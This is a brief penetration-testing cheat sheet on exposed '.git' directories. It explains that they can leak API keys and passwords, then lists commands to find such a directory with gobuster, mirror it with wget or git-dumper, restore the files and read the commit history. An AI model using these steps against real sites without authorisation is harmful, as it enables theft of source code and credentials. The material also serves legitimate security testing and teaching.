🐈‍⬛Git Exposure

Theory

Git is a widely used code versioning tool for application development. It allows developers to always keep an up-to-date copy of the code and to have greater control over changes made.

The danger occurs when the application leaves the “.git” directory, which is in the system root, exposed. By carelessness, an application that uses Git for versioning can expose the “.git” directory.

This directory of source code can contain sensitive information such as API keys, developer comments, AWS keys, and even the password to a system’s administrative screen and logs of all changes made during development.

Practical

Finding the exposed .git

# gobuster
gobuster dir -u http://10.10.213.12/ -w /usr/share/dirb/wordlists/common.txt

# DotGit Extension

Downloading .git

# wget
wget --mirror -I .git <URL>

# git-dumper
bash gitdumper.sh http://target/.git/ <dest-dir>
OR
pip3 install git-dumper

Check status

git status

Restore files

git checkout -- .
or
git restore .

Read logs

git log

Read commits

git show <commit id>

REFERENCES

• https://medium.com/stolabs/git-exposed-how-to-identify-and-exploit-62df3c165c37

• https://infosecwriteups.com/exposed-git-directory-exploitation-3e30481e8d75